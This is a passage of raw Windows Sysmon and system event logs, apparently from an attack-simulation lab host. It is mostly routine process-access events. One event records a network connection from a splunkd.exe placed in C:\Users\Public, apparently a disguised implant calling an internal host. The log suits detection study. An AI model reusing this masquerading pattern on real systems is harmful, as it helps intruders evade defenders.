C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010B8DD0300}\r\nTargetProcessId: 3740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010B8DD0300}","TargetProcessId":"3740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":2003,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-08-01 05:46:46.832\r\nProcessGuid: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nProcessId: 3048\r\nImage: C:\\Users\\Public\\splunkd.exe\r\nUser: NT AUTHORITY\\SYSTEM\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 49686\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 10.0.1.12\r\nDestinationHostname: \r\nDestinationPort: 7010\r\nDestinationPortName: ","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","RuleName":"Usermode","UtcTime":"2020-08-01 05:46:46.832","ProcessGuid":"{A837DB8D-01BD-5F25-0000-00108F930200}","Image":"C:\\Users\\Public\\splunkd.exe","User":"NT AUTHORITY\\SYSTEM","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"49686","DestinationIsIpv6":"false","DestinationIp":"10.0.1.12","DestinationPort":"7010","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76817,"ProcessID":856,"ThreadID":1272,"Channel":"System","Message":"The NetSetupSvc service entered the stopped state.","param1":"NetSetupSvc","param2":"stopped","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.453\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-0010B8DD0300}\r\nSourceProcessId: 3740\r\nSourceThreadId: 3728\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.453","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-0010B8DD0300}","SourceProcessId":"3740","SourceThreadId":"3728","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010B8DD0300}\r\nTargetProcessId: 3740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010B8DD0300}","TargetProcessId":"3740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
